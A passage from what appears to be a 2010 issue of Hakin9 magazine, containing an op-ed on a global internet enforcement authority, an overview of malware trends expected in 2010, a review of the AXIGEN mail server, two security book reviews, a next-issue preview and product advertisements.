The world, finally realizing its vulnerability, will agree to a protocol of law enforcement and abuse control to prevent this from happening again. A global group will be set up with central authority but enforcement officers and investigators within each country. These locals will be trained by and answer to the central authority, but be funded by the local country. Each country will also have to contribute to the central authority. These funds will be raised by taxing Internet access and infrastructure. 

So, in order to be 'on' the Internet (i.e. have IP space assigned and be peered and routed by everyone else) you must pay your dues to this group and cooperate with their investigations. When a citizen of your country is accused of a cyber crime they are arrested by local law enforcement and prosecuted in a centralized court. If convicted the bad guy does their time in a prison in ANOTHER country. This will eliminate the temptation for a corrupt government to give their big money bad guys a country club jail sentence. No bad guy will be excited about the prospect of doing their time in a random third world prison. 

Countries that don't cooperate and clean up will be unplugged. The effect on even a developing economy and society will be devastating. The people will rise up and demand Internet, the governments will either clean up and cooperate or be overthrown. 

Big Brother you say? This will result in a global police state? Maybe. The member states would have to have the authority to manage and control this authority and amend its constitution in an effective manner. But as long as it's funded and enabled/authorized to investigate and arrest bad guys we'll have a much safer place. Think EU, rotating presidents, constituent voting, etc. Just without the common currency and work visas. 

I have an even better idea, let's do the central authority for the Internet WITHOUT invading a country or losing a major database.... Naw, that'll never work. Dammit! It's going to take an invasion. Any volunteers? 

As always please send me your thoughts, jonkman@emergingthreats.net 
ID fraud expert says... 

A Look at the Malware Trends Expected in 2010 

JULIAN EVANS 

It's now coming to the end of 2009, so it is a good time to look at the malware from 2009 and at the trends expected in 2010. This isn't a conclusive article, but it will highlight the most common threats to PCs and enterprises in 2009 and the potential emerging threats to come in 2010. 



Malware defined 

Most readers will know what malware 
is, but you'd be amazed just how many 
people don't! So for the benefit of those 
readers that don't - here is malware 
defined. Malware appears in many 
different forms, but they share one 
common bond - they are unwanted bits 
of code that embed themselves on a PC 
without the user ever knowing (in most 
cases and except for those of us who 
actually check our PCs regularly for any 
malicious code). 

Malware growth trends 

The graph below highlights the unique malware growth trends for 2008 and the first half of 2009, but actually doesn't include all the other malware that Avert Labs detected generically or heuristically. Add in the generic and heuristic detection numbers and one can assume the numbers will go through the roof. Glance at the graph and you cannot fail to notice that growth is almost three times what it was in 2008. So expect these numbers to climb yet further in the latter half of 2009 and start jumping even higher in 2010 (see Figure 1). 

There are many types of malware - here are the prolific ones as reported by leading security vendors in 2009. These will also appear in 2010, potentially developing new, more clever ways to defeat AV systems and harvest user data: 

Adware 
Tracking cookies 
Poisoned searches 
Rootkits 
Keyloggers 
Drive-by downloads 
Trojan horses 
Rogue AV software 
Browser hijackers 
Worms 
Internet diallers 
Piggyback attacks 

Having taken a step back and gasped at the different insidious infection methods highlighted above, you'd be forgiven for thinking: what do I have to do to protect my PC? In fact with a little knowledge you can use the internet safely and reduce the chances of malware exposure - the problem is that most individuals, and to an extent businesses, don't actually know how to. The main reason: they don't know enough about how malware infects PCs and networks. 

Figure 1. Half Year Malware Growth Comparison 

Therefore it's not surprising to note that the AV security industry is worth billions of dollars, but equally it is also worth a significant amount to the criminal underworld. Not surprising then, that malware has become such a widespread problem and will continue to do so into 2010 and beyond. 

Malware is setting the trend 

First, let us look at the malware trends 
that individuals might expect to see 
in 2010. According to the experts and 
the statistics, the PC Malware trends 
chart above is showing that malware is 
growing at an alarming rate and in 2010 
is expected to grow faster than it did in 
2009. 

In the past few weeks (November 30th 2009) leading US researchers have uncovered a way in which to hide malware in English language sentences. 

Current security techniques work on 
the assumption that the code used in 
code-injection attacks, where it is delivered 
and run on victims' machines, has a 
different structure to non-executable plain 
data, such as English prose. 

Dr Nicolas T Courtois, an expert in 
security and cryptology at University 
College London, said the work was an 
important paper in virusology, challenging 
an assumption that code has a different 
structure to non-executable plain data. 
He said malware deployed in this way 
would be hard, if not impossible, to detect 
reliably. 

It's worth pointing out that the research 
is currently proof of concept. Additionally 
hackers are unlikely to be currently using 
the English Language to deliver malicious 
payloads, in particular because of the 
amount of engineering work that would be 
required. 

This latest finding will of course highlight the weaknesses in current anti-virus detection. That said, the anti-virus industry is adapting (just like the malware writers) and expect to see a move to community based signature detection (i.e. like Symantec's database called Quorum) as well as new and improved behavioural detection algorithms to combat existing and future malware exploits. 

The research paper, presented at the 
Association of Computing Machinery 
(ACM) Conference on Computer and 
Communications Security in Chicago, in 
November, is called English Shellcode 
- after the hacking community's generic 
name, shellcode, which refers to the 
payload portion of a code-injection 
attack. 

This payload typically provides 
attackers with arbitrary control of system 
resources, applications, and data on 
a vulnerable machine. Attackers then 
choose how they want to continue their 
attack. 

A tool that takes a piece of normal shellcode and generates some text to hide it could be the next step in the hacking and virus arms race. The advantage to hackers is simple. Alphanumeric shellcode can be stored in typical and otherwise unsuspected contexts such as syntactically valid file and directory names or user passwords. 

The challenge is that the alphanumeric character set is significantly smaller than the set of characters available in Unicode and UTF-8 encodings. This means that the set of instructions available for composing alphanumeric shellcode is relatively small. You couldn't have long strings of mostly capital letters, for example. 

The team trained using English texts, roughly comprising 15,000 Wikipedia articles and 27,000 books from Project Gutenberg. The team can now generate English shellcode in less than one hour on standard PC hardware with 4GB of RAM. 

Below is an example of automatically 
generated English encoding. The text in 
bold is the instruction set and the plain text 
is skipped. 

There is a major center of 
economic activity, such as Star Trek, 
including The Ed Sullivan Show. The 
former Soviet Union. International 
organization participation. 

Social malware 

In 2009 we saw the rise of social network malware, not for the first time, but certainly the largest increase as more and more people joined these networks (i.e. Facebook and Twitter). The fraudsters are tapping into new ways to social engineer sensitive personal information through the use of malicious third-party applications/widgets, fake profiles, poisoned links and spamming, just to name a few techniques that are used. 

Figure 2. Growth in password-stealing malware 

A really good example of the social malware is the email message that individuals will send with, say, a funny video clip. The unsuspecting users may not realize the source and inadvertently click the link to a fake video which drops a malicious payload onto the PC. Hardly social behaviour you might think! The problem is that social malware is easy - individuals like to be popular, i.e. have many friends, and as Andy Warhol said in Exposures back in 1979 - in fifteen minutes everybody will be famous. 

Andy was very forward thinking, so look to today and you will see everyone wants to be a celebrity or at least very popular (or given the appearance they are) - hence the Facebook line of how many friends have you got - meaning you have more than me. Sadly there is also the underworld, where organised crime gangs lurk, realising the financial perks of using this social revolution to exact a social engineering plot to extort sensitive individual details on a global scale. Believe it, this is happening at the same time this feature is being written. In fact, a lot of people might not realise they are a victim until it is too late (see Identity theft section later). Also, importantly, don't forget these fraudsters are clever and will look to manipulate the situation whatever and however long it takes. 

Most people have heard of Twitter, but has anyone heard of the short URL threat? Shortened URLs are proving extremely popular with micro blogging websites such as Twitter. More and more people are finding adding shortened links (bit.ly) useful as they allow you to add more descriptive text - but this is also an opportunity for fraudsters to exploit shortened URLs. These services are a great way (and at very low cost) for fraudsters to spread malware code. 

Example 

"Leighton Meester sex tape video free download" the tweet teasingly offered. But beware - as this tweet complete with shortened URL had a nasty secret! 

Unfortunate Twitter users who took the bait (above example) were in for a treat other than revealing clips of the Gossip Girl vixen. The link led users to a fake porn site where online criminals try to install a nasty Trojan program on the victim's machine. It was yet another one of the attacks that victimized tens of thousands of Twitterers. 

These assaults have the potential to hurt both individual users and companies that are increasingly using Twitter to promote their business. Shortened URLs are shortened (hidden) links that can hide a link to a malicious website; you might end up with a malicious file on your computer, lose personal financial information i.e. online bank login details and/or lose your personal identity and spend lots of time and money recovering your identity. These types of social attacks are set to continue and develop in 2010. 

Figure 3. Various types of identity theft (US) 

Password malware 

Gaming passwords are the most targeted logins on the Internet, especially as the black market for gaming goods and currencies, and the malware to steal them, continues to grow. Figure 2 clearly shows the growth of gaming malware far surpasses that of malware seeking banking logins (which are also high on fraudsters' shopping list), making gamers the most targeted group on the Internet. Cybercriminals are developing programs that steal gaming passwords so that they can sell off gamers' virtual goods for actual real money - this includes everything from custom characters to virtual money. 

The most infectious password-stealing malware are Trojans which drop their payload onto a PC after an individual has opened an email attachment. The malware code will then direct the user to the malicious website. Once the malware is installed the Trojan will collect usernames and passwords from your PC hard drive. They do this by targeting software such as Internet Explorer, FTP sessions and online games such as World of Warcraft. Expect cybercriminals to develop new cyber self-protection mechanisms, something like the rogue anti-virus programs (scareware, which will be discussed in the next section) that disable Trojan removal, disable firewalls, stop existing anti-virus from working and hijack browser sessions using redirectors. 

Rogue anti-malware 
software (scareware) 

2009 saw an unprecedented number of 
rogue antivirus programs appearing on the 
Internet. These rogue antivirus programs 
are often referred to as scareware or fake 
security software: they promise 
to secure or clean up a user's PC, but in 
reality install a malicious program (for 
example: a Trojan). 

The scareware program produces 
false or misleading results. Worse, 
it demands you pay to remove the 
malicious software. If you attempt to use a 
search engine to find out how to remove 
the malicious program, you might find the 
Trojan has also poisoned your search 
queries as well. An example of this is when 
you search for an anti-virus or spyware 
removal program and find the link 
redirects you (called a redirector) to a fake 
website. 

Memory (RAM) attacks 

RAM scrapers have been around for 
years, but very few people have ever heard 
of this type of malware threat, and that 
includes people within the security industry 
too. With industry rules globally requiring 
credit card data to be encrypted, the threat 
of RAM (computer memory) attacks will 
increase and is becoming a bit of a rage 
among the cyber crime community. It's not 
necessarily easy money, but it certainly can 
reap big financial gains. 

RAM scrapers are not new. They 
have in fact been around for years, but 
the recent threat seen by some leading 
security companies leads industry 
analysts to believe this may well be the 
next real threat in 2010 and into 2011. The 
credit card industry is going to have to 
encrypt all its data, as the RAM scraper 
threat is going to be a great opportunity 
for fraudsters. 

RAM scrapers are malware 
programs that search RAM (Random 
Access Memory) on point-of-sale 
terminals (POS), where PINs and other 
credit card data must be stored in 
the clear so they can be processed. An 
example of a recent attack involved 
malware that logged only the payment 
card data rather than dumping the 
contents of the memory, which ensured 
the malware didn't create server 
overload - in effect this hid the malware 
from security software. 

Fraudsters would then harness this 
opportunity by intercepting the information 
and uploading it to powerful servers dotted 
around the globe. 

Security specialists would be able to 
identify whether a server was infected 
by looking for sudden changes in disk 
space, the presence of unusual 
scripts, and changes to the 
system registry and system processes. 
Consumers on the other hand have no 
control over what happens to their data, 
and in the event a RAM scraper stole 
credit card details, only the credit card 
company would be held liable, not the 
consumer. 

Poisoned search 

2009 has also seen the rise of 
cybercriminals using Google's 
AdWords program in order to get 
malicious sites placed at the top of paid 
search results. 



Some search results, listed to the 
right of organic search results in Google, 
contain links purporting to take searchers 
to the subject they are looking for, but 
redirect them to sites that infect their PCs 
instead. 

In addition, the malware on those sites 
has been tweaked to evade detection by 
many antivirus applications, experts said. 

If the link redirects to a site with 
malicious code, the tactic would appear 
to violate Google's own policies regarding 
AdWords, such as not allowing URLs in 
AdWords results to redirect to other URLs. 
Google is attempting to stop this kind of 
malware threat, but it is difficult to police. 
Expect to see an increase in poisoned 
search exploits over the next 12 months. 
It has also been reported that we will 
see an emerging threat to the security 
of Internet users which combines Google 
search with websites running out-of-date 
software, similar to what happens with 
blogs. The blogs themselves are indexed 
by Google and contribute the material that 
comes up during searches. 

Cybercriminals are starting to use this 
attack vector which compromises existing 
blogs to get indexed by Google. These 
are referred to as rogue blogs and are 
easily updated automatically with titles 
that intentionally avoid popular websites 
so that they don't get lost in the ocean 
of authentic websites that cover those 
respective topics. The bizarre part of this 
attack vector is that most of the rogue 
blogs only contain pictures. The reason 
for this is that the images are collected 
by images.google.com and turn up if the 
same combination of words found in the 
title of the blog post is entered into the 
search box. 

For the images to appear at the 
top of Google search results, the 
cybercriminals have worked out that 
all you have to do is make sure each 
image carries alt and title attributes 
that match the words in the title. The 
poisoned link is triggered when a user 
clicks on the image and is taken 
to a malicious website where, in some 
cases, notification pop-ups appear 
alerting the individual that they are 
infected, when in fact they are not. 

The individual may be tempted into 
downloading the rogue software (see 
previous section) which then installs its 
malicious payload. Expect the image 
search threat to develop in 2010. For those 
interested in finding out how to avoid this 
threat, all you need to do is copy-paste the 
link in the search results directly into the 
browser - the trick is the malicious code 
only redirects you if you arrive through the 
Google search. 

Malware and Identity theft 

Identity theft is very much related to 
malware and I'm sure you can see the 
connection. In fact the relationship is 
more of a marriage, as malware is the 
engine while identity theft is the offence 
committed by using the data collected by 
the malware to steal for financial gain. 
Javelin Strategy & Research Center in the 
US completed a study earlier this year 
(2009) and they concluded the following: 

■ Identity theft is on the rise, affecting 
almost 10 million victims in 2008. 
That's a 22 percent increase from 
2007. 

■ Victims are spending less money 
to correct the damage from identity 
theft. The mean cost per victim is 
$500, and most victims pay nothing 
due to zero-liability fraud-protection 
programs offered by their financial 
institutions. 

■ 71 percent of fraud happens within 
one week of the theft of a victim's 
personal data. 

■ Low-tech methods for stealing 
personal information are still the most 
popular for identity thieves. Stolen 
wallets and physical documents 
accounted for 43 percent of all identity 
theft, while online methods accounted 
for only 11 percent. 

Here is a useful chart describing the 
various types of identity theft identified by 
the Federal Trade Commission (FTC) (see 
Figure 3). 

The enterprise threat 

For businesses there will be 
unwanted threats as well. Here is a 
snapshot of some threats facing security 
administrators and enterprise and mid- 
sized business information security (IS) 
managers in 2010: 

■ Malicious websites targeting visitors 
with clever manipulation of IP 
addresses, whereby the IP address 
changes every five minutes, making 
detection ever more difficult 

■ Threats from automated repackaging 
malware applications which change 
how malware will be delivered every 
few minutes 

■ Mobile devices that connect to a 
network and encourage virus and 
malware propagation - for example 
an SMS worm which sends out an 
SMS without your knowledge or steals 
your company and personal contacts 

■ PDF and Flash exploits that inject code 
to steal information using a keylogger 
or other malicious Trojan/malware. 

Spamming 

Spamming has not been mentioned so far 
in this article. Spamming will be with us 
just like all the malware described but 
will evolve over time. The main reason 
for this is that it is so well known and 
very easy to stop individuals from 
being infected if they scanned each link 
and made sure they used a sandbox. 
Problem is most individuals do not know 
what a sandbox is. A quick glance at 
Figure 4 will provide further evidence 
that spam is not declining. Spam as a 
percent of total email volume also set a 
new record, reaching 92 percent during 
the third quarter of 2009. Compared 
with last year's third quarter, spam is 
up 24 per cent. Expect the December 
bar to increase yet further as spam 
always increases during holiday periods. 
[McAfee Threats Report Third Quarter 
2009]. 

Anti-malware industry and 
final thoughts 

Expect in 2010 to see AV companies 
around the world look to develop, license 
or acquire anti-malware behavioural 
technology. One such company, called 
Novashield, is leading the way with its 
advanced anti-malware behavioural 
solution. In the enterprise security 
business, vendors are looking into 
blended threat modules which combine a 
signature database, community feedback 
(like Symantec's database called Quorum 
- which makes use of the anonymous 
software usage patterns of Symantec's 
extensive volunteer user community to 
automatically identify entirely new spyware, 
viruses and worms) and behavioural 
detection. 

The biggest problem facing security 
vendors in 2010 and beyond will be their 
ability to keep up with the development 
of new malware by the cybercriminal 
fraternity. 

No one can categorically say that the 
blended threat module approach will work, 
but with behavioural detection and good 
education the AV companies can go 
some way to protecting more individuals 
and businesses in 2010 and beyond than 
in 2009 and previous years. 

2009 has truly seen the rise of 
malware and in particular email spam 
delivering malicious attachments, i.e. PDF 
and image files. As in the Terminator 
film subtitled Rise of the Machines, 
2009 has seen the rise of malware. 
2010 will see an ever increasing variety 
of malware attack vectors, some of which 
have been covered in this article and 
others have yet to be found or developed. 
a wide range of security tools, Axigen Mail Server now incorporates: 

Identity Confirmation 

Challenge / Response anti-spam filtering at your disposal 

■ Upper-level anti-spam protection already embedded in the messaging solution 

■ No additional cost, Address Book correlation, completing an outstanding arsenal of anti-spam tools 

■ The most extensive security mix on the market for a spam-proof inbox. 

To learn how Identity Confirmation works, please visit www.axigen.com/ic 

To compare our vision with your security expectations, go to www.axigen.com/security 



REVIEW 



AXIGEN MAIL 
SERVER 




The time may have come to 
consider a change, or maybe an 
exchange, of the software you're 
running, or considering running, for your 
in-house mail server needs. A field long 
dominated by Microsoft's Exchange 
software has seen the rise over the 
past five years of a very feature-rich and 
real alternative in Gecad Technologies' 
AXIGEN mail server. 

Overview 

Many organizations find, particularly as 
they grow in size above 20-30 users, that 
there are significant benefits to bringing 
mail services in house. Several items 
of primary concern in making this 
decision are: 

■ Benefits - What are some of the specific 
benefits derived from having the mail 
servers in house? 

■ Total Cost of Ownership (TCO) - What 
are the initial acquisition, installation 
and ongoing costs of having the mail 
services operation in house versus out- 
sourced? 

■ Installation 

■ Configuration and Maintenance 
- What skills are required to initially 
configure the server and do ongoing 
normal operations such as adding 
and deleting users, installing upgrades 
and maintaining security? 

Addressing these items directly highlights 
some of the strengths of the AXIGEN 
mail server as the right choice for many 
organizations, particularly those in size of 
around 40-400 users. (To note this user 
range is chosen somewhat arbitrarily but 
from my experience as an IT consultant 
I'm considering the depth and skill set of 
the IT staff such organizations typically will 
have.) 

Benefits of In-House Mail Server 

Foremost in the consideration is 
recognition of the key role email plays 
in today's business world. Moreover 
many jurisdictions are placing legal 
requirements on the archiving of an 
organization's email. 

If we accept that email is critical to 
user productivity then the question logically 
follows: how do we limit distracting content 
such as spam? Recent analyses of email 
traffic on the Internet have indicated that 
spam (UCE - Unsolicited Commercial Email) 
now comprises in the range of 80-90% 
of all daily email traffic. Regardless of the 
actual percentages, the fact is spam/ 
UCE and malicious email, such as those 
carrying attachments containing viruses, 
are a serious issue. An in-house solution 
such as the AXIGEN mail server gives a 
much greater degree of control over these 
issues. 

Specifically, the server software 
comes with ClamAV, SpamAssassin 
and Commtouch built in to the 
distribution. This installed suite gives the 
user an immediate baseline anti-virus 
and anti-spam solution set, and other 
well known anti-virus solutions are easily 
integrated if desired. 

Another feature often overlooked is 
the ability to easily „white list" specific 
email addresses or whole domains 
as needed. White listing of course 
allows email to bypass spam filtering, 
thus removing the risk that important 
email(s) from customers or business 
partners are accidentally marked and 
deleted as spam. I would note in my 
more than a few years of consulting I've 
sometimes had to repeatedly petition 
an external mail service to handle this 
for a customer and sometimes it just 
never gets done. In a specific instance 
one client had to quit doing business 
with another company because they 
couldn't simply white list her email 
address and her orders were constantly 
being rejected as spam. I would note the 
amount of business the other company 
lost was not small. 
A final point in the list of some of the 
key features of an in-house server is 
the ability to easily archive mail for both 
backup purposes and to meet regulatory 
requirements. 

Total Cost of Ownership 

Taking from a recent white paper released 
by Osterman Research: „the cost of 
deploying and managing Exchange for a 
100-seat organization is in the range of 
$35-$40 (USD) per seat per month, while 
for a 1000-seat organization the cost will 
be on the order of $12-$15 per seat per 
month." 

As the above demonstrates larger 
organizations can benefit from the 
economies of scale in amortizing the fixed 
costs over a larger user base whereas 
the smaller organizations typical of the 
SMB/SME market can't as readily. Given 
the lower cost of acquisition and ease of 
configuration and maintenance (outlined 
below) smaller organizations can realize 
a TCO well under the $35-$40 that 
deploying Exchange would entail. 

Installation 

Installation of the software was done on 
a Windows 2003 server and couldn't 
have been easier. While installation on 
Linux distros was not carried out, given the 
advancements in the area of package 
installation in the Linux world I suspect the 
results would be similar. 

Configuration and Maintenance 

This is an area where the AXIGEN Mail 
Server software really shines, as can 
be seen from the screen capture which 
illustrates the initial administration screen 
when logging in. 

The graphic interface is very 
nicely designed with a logical flow for 
standard administrative needs, starting 
with Global Settings for the server and 
then progressing through „Services" 
(POP3, SMTP, IMAP), and „Domains and 
Accounts" where domain, group and user 
management options are found. 

The following listing gives the specific 
management options available: 

■ Global Settings 
■ Services 
■ Domains and Accounts 
■ Security and Filtering 
■ Queue 
■ Status and Monitoring 
■ Logging 
■ Back-Up and Restore 
■ Automatic Migration 
■ Clustering 
■ Administration Rights 



[Screenshot: the „Services" sub-menu - Services Management, SMTP Receiving, SMTP Sending, IMAP, POP3, Webmail] 




In performing administrative tasks 
each menu option expands with drop- 
down options, such as shown below for 
configuring mail services. 

Each item in the „Services" 
administration area then opens to a 
full screen of options that are logically 
arranged and easily understood. The 
range of typical needs for services is well 
covered in providing SMTP, POP3 and 
Webmail, as can be seen in the „Services" 
sub-menu shown. 

Given the logical layout and excellent 
graphic interface most users with some 
knowledge of email functions and 
protocols should have minimal difficulty in 
getting the server up and running. 

Conclusions and Summary 

As an IT consultant to the SMB/SME 
sector I'm ever aware of the two conflicting 
items smaller businesses face, those 
being enterprise-level needs and budget 
constraints that require hard choices, 
usually for lesser services. In this case I 
would say the AXIGEN team has created 
a winning combination of a powerful 
mail service software package giving key 
functionality at a TCO that makes sense 
for even very small organizations. 

Given the ubiquity of the installed 
base of Microsoft's server software, the 
rather low cost for relatively powerful 
servers and the growing security issues 
surrounding email, it's an easy argument 
that even smaller organizations should be 
considering using the AXIGEN solution to 
bring mail services in house. 

About Gecad Technologies 

Gecad Software was established in 1992 
with a primary mission of researching 
and developing software products. Gecad 
Technologies was established in 2001 
and since 2004 has focused on the 
development and distribution of innovative 
messaging solutions under the brand 
name AXIGEN. A significant portion of the 
software development team has extensive 
experience in the area of network 
security, having formerly worked on the 
development of the RAV anti-virus software 
(sold to Microsoft in 2003). 

Mike Shafer 
BOOK REVIEW 




Author: Edward L. Haletky 
Publisher: Pearson Education Inc. 
ISBN-10: 0-137-15800-9 
ISBN-13: 978-0-137-15800-3 



Review of the VMware book 



As a Security Architect I was excited 
to hear about the new VMware 
vSphere and Virtual Infrastructure 
Security book; having worked on the security 
of a number of VMware infrastructures, I found 
a comprehensive book on the subject was lacking. 

The book starts off explaining the challenges 
and issues of security in a virtualised environment. 
Chapter 2 follows on, explaining the anatomy of 
a hack and its consequences; regular Hakin9 
readers would be fully aware of these topics, 
including Cross-site scripting, buffer overflows and 
SQL Injection attacks. What is really clever is the 
author then references these chapters throughout 
his book, putting configurations and designs into 
context for the reader. 

This brings me to my first issue with the book: 
the author is definitely an expert on VMware 
technologies and has enormous experience. 
Whenever the author talks about VMware the 
information is clear, concise and generally very 
good, but whenever the author discusses security 
topics I found the information would sometimes 
be lacking, miss the point or just not be based 
in the real world. For example, in Chapter 1 his 
basic definitions of Threat and Vulnerability were 
poor and he then links them together with a term, 
Security Fault; there are further examples of these 
problems throughout the book. 

Overall the structure of each chapter in the 
book is good, the author starts off explaining 
some terms, shows some secure designs, brings 
massive technical knowledge and experience 
and then provides some additional reference. The 
author also makes creative use of Security notes, 
little comments throughout the pages. 

There are twelve chapters in this book and 
after defining the security issues they can be split 
into a number of overall ideas, starting off with 
the internals of VMware. In Chapters 3, 4 and 5 
the author discusses the internal workings of the 
VMware hypervisor and how its design affects 
security, a chapter on Storage, with sections on 
SANs, iSCSI and VCB, and a chapter on Clustering, 
again working on the design and types of clusters 
but also the technical side of how they work and 
the considerations in terms of security. 

The book then moves on to the management 
of VMware, with Chapter 6 starting off an overview 
of the deployment and management of VMware 
solutions, including sections on integration with a 
number of Directory Services and even a link to 
a Twitter plug-in for the management client VIC. 
In Chapter 7 - Operations and Security there 
were sections on the day-to-day management 
of VMware ESX servers, and with Chapter 8 a 
discussion on Virtual machines (VM Guests) and 
their security and management. 

The final few chapters included Networking 
(Chapter 9) with extensive diagrams, some 
with large numbers of VLANs and network 
cards; VDI (Virtual Desktop Infrastructure), an 
exciting technology allowing personalised virtual 
desktops; Chapter 11 (Security and VMware 
ESX), which discussed strategies for lock-down of 
individual ESX hosts and virtual environments; 
and Chapter 12, Digital Forensics and Data 
Recovery. There was also a small conclusion 
chapter summarising the author's final thoughts 
and extensive Appendix sections. 

My favourite chapters were Digital Forensics 
and Data Recovery (Chapter 12), not something 
discussed in regular VMware books and Virtual 
Networking Security - Best practices (Chapter 
9), which had some comprehensive secure 
network designs. 

All in all a significant amount of work has 
gone into this book, but there are some major 
flaws. Part of the book's title is VMware vSphere, 
but there is little or no mention of vSphere or ESX 
4.0. In Chapter 11, all of the hardening steps are 
for ESX 3.5, although the overall designs are still 
valid and there is enough reference material to 
fill in the gaps with your favourite search engine. 
There was also no mention of the whole area 
of patching VMware hosts or VM Guests with 
VMware Update Manager, and also no discussion 
of VMware's firewalling technology vShield, which 
comes bundled with the advanced versions of 
ESX 4.0 and would have had significant impact 
on Chapter 9 (Virtual Networking Security). 

Overall the book has good structure and an 
easy going writing style, it also brings together 
a number of good sources of information in 
one easy to follow book. If you are a System 
Administrator or a System Architect that 
designs VMware solutions then it is a good 
reference guide and a comprehensive work. If 
you're a Security professional then there is also 
some good information in terms of design and 
summaries of the issues surrounding VMware 
environments. 
REVIEW 

Hacking the Human 

IAN MANN 



Every security system in the world 
has the exact same weakness: the 
human being that is always present 
somewhere with the necessary access for 
someone to exploit. 

This book is dedicated to the wonderful 
world of social engineering, the one area 
that is usually missed on audits and risk 
assessments, but in my opinion this is the 
most important area, because if you can get 
someone to do the deed on your behalf, how 
can you get caught! 

By concentrating on the psychological 
aspect of social engineering (it's not just about 
conning people), this book explains in detail all 
the basics of human vulnerabilities. There is an 
excellent set of examples throughout the book 
that make the reader start to think outside 
the usual technical security boundaries, and 
concentrate on the easiest route to exploit. 

The author uses the introduction as 
an example in social engineering, which 
was a new experience. Some people skip 
introductions and want to get straight into a 
book. I read this one 3 times, double-checking 
it against the details provided in a later 
chapter. 

Throughout the book there is constant 
reference to ISO27001, which highlights how 
seriously everyone needs to take the risk of 
having people working for them, and how they 
need to be trained and protected from this 
very easy avenue of attack. There are three 
sections to the book: 

The Risks 

This section introduces you to the world 
of social engineering and the risks involved 
in this area. By explaining the various 
approaches that can be used to assess this 
risk, each is compared against ISO27001 and 
how relevant this approach is towards social 
engineering. 

By clearly explaining the vulnerabilities 
we all face and the risks associated with the 
psychological weaknesses that we all have (it is 
part of the usual human nature after all) it starts 
to become clear how complex this area of 
information security really is. You are given an 
excellent example of an attack on a company, 
and how to take a „non-standard" approach 
towards breaching their security. 



Understanding Human 
Vulnerabilities 

The next section was fascinating for me, and for 
those of you that ever have to deal with sales 
people. See how many of these techniques you 
can identify being used on you when they next 
come to call (or you could try these techniques 
on them, and pay a cheaper price). 

From mind reading to neurolinguistic 
programming, this section clearly explains how 
what we say and the way we say it can have a 
huge effect on people and on ourselves. There 
is a very good diagram that shows which 
personality profiles on average tend to comply 
and which of those would potentially challenge 
your perceived authority. 

Every time a social engineer attacks a target, 
they will „put on" a persona while performing 
the attack. These personas are grouped into 
3 distinctive groups (Parent, Adult, Child), and by 
adopting one of these states, the engineer will 
know how to deal with the other 2 types if they 
come across them during their attack (there is 
a lovely example of how to make a child spill a 
drink, while telling them not to!). 

Countermeasures 

This final section takes you through starting 
to build a defence against social engineering 
attacks, from profiling your own staff to building 
awareness within them of how people will try 
to persuade them to release information that 
should be kept confidential. You are then given 
details on the different types of testing that can 
be conducted. Use the information gathered 
from the book to start your own tests, and see 
how vulnerable you really are. 

There is a further reading section at the 
end of the book which has good advice for those 
of you that wish to pursue more information 
regarding this „black art", and it also points 
to where the author has pulled his ideas and 
information from to produce such an excellent 
read. 

I can't recommend this book highly enough; 
this book belongs on every IT 
Security Manager's shelf in my opinion, as there 
clearly aren't enough books out there that bring 
enough focus to this area of vulnerability within 
every company. 
Buy this book! 



Author: Ian Mann 
Publisher: Gower Publishing Ltd 
ISBN-10: 0566087731 
ISBN-13: 978-0566087738 



2/2010 HAKIN9 81 




Inside-Out web based 
attacks: the new ways 

This article is very technical and discusses 
new techniques of exploitation based 
on the web: inter-protocol exploitation, 
GIFARs and cross-domain policies, PDFARs, 
XSRF. This is a really hot topic, as most 
applications are being written on the 
web, and for the web. Combining known 
techniques with social engineering and 
0-day exploits (and a bit of inventiveness), 
new attack scenarios can be created 
(bypassing security policies such as DMZ, 
firewalls, antivirus, even the advanced user 
who can be suspicious). 



Current information on 
Hakin9 Magazine can be 
found at: 

http://www.hakin9.org/en 



The editors reserve the right to make changes to the content. 



Forensic Examination 
and Evaluation of Instant 
Messenger Databases 

Nowadays more and more people use 
various instant messenger services like 
ICQ, MSN, AOL, or even less known ones like 
Gadu-Gadu for work, for pleasure and 
sometimes also for crimes. The article 
aims to provide information and insights on 
how the information disseminated through 
those networks is stored on the local 
computers and what can be found there, 
where and how. 



The next issue will be 
available in May 2010 

Where to find it? 

■ Barnes & Noble 

■ Borders 

■ B. Dalton 

■ Microcentre 



Analyzing Malware & 
Malicious Content 

Malware, short for malicious software, is 
a piece of software whose sole purpose 
and design is to infiltrate or cause 
damage to a computer system without 
the owner's well informed consent. In the 
information security world we hear this 
term or expression all the time, used by 
professionals to describe a variety of 
hostile, intrusive or otherwise annoying 
code running on a system. 



Pwning Embedded ADSL 
Routers 

This paper sheds light on the hierarchical 
approach of pen testing and finding 
security related issues in the small 
embedded devices that are used for local 
area networks. The paper is not restricted 
to testing but also discusses 
the kinds of software and firmware used 
and recurring vulnerabilities that should 
be scrutinized while setting up a local 
network. A detailed discussion will be 
undertaken about the HTTP servers used 
for handling the authentication procedure 
and access to the firmware image, providing 
functionalities to design and configure your 
own home local area network. 



Do you have a good idea for an 
article? 



Would you like to become an Author 
or our Betatester? 



Just send us an e-mail at: 
en@hakin9.org 
Much more than just an antivirus 



Antivirus & Anti-malware 



Anti-phishing 



Two-way firewall 



Real-Time & On-demand scanners 



Anti-spyware 




Protect your Mac from malware and network threats 

Only VirusBarrier X6 provides comprehensive protection from malware and network 
threats. VirusBarrier X6 is the only antivirus program for Mac that includes full anti-malware 
protection together with two-way firewall, network protection, anti-phishing, anti-spyware 
features and more. VirusBarrier X6 protects Macs from all known network-based 
threats, as well as all known malware. 

Also available is Internet Security Barrier X6, which includes VirusBarrier X6 and four 
other Intego programs, providing parental control, backup, antispam, confidential 
document protection features and much more. 

Intego X6 software is priced lower than X5 versions, and the standard licenses protect 
up to 2 Macs. Also available: 5-Mac family packs and multi-seat licenses. 




www.intego.com 
Intego - we protect your world 



Protects your computer, 
the environment and your wallet. 




APC Back-UPS BE750G with 
SmartShedding Technology 
automatically powers down 
idle peripherals to save 
energy and money. 




Get the most energy-efficient desktop battery backup yet. 



Let's protect what's important. 

What's in your computer? Photos, music, 
personal files, financial data, broadband 
access, videos, and more. Your computer 
has never been more important, and 
yet it has never been at higher risk 
for damaging power surges and other 
disturbances. 

So like most people, you need to protect 
your assets. But like most people, you'd 
also like to protect the environment. 
With our new energy-conscious products, 
you can do both. Energy efficient by 
design, our new smart products protect 
the power going into your computer, 
at a cost that is quickly offset by big 
energy savings. How? Not only do the 
new Back-UPS ES and SurgeArrest 
use power wisely, they also boast a 
master/controlled outlets feature, which 
automatically powers down idle devices 
to conserve energy. 

APC power protection products are available at CDW, Staples, and PC Connection.



"The price tag on the new UPS is $99. While
I'm not in the habit of endorsing products 
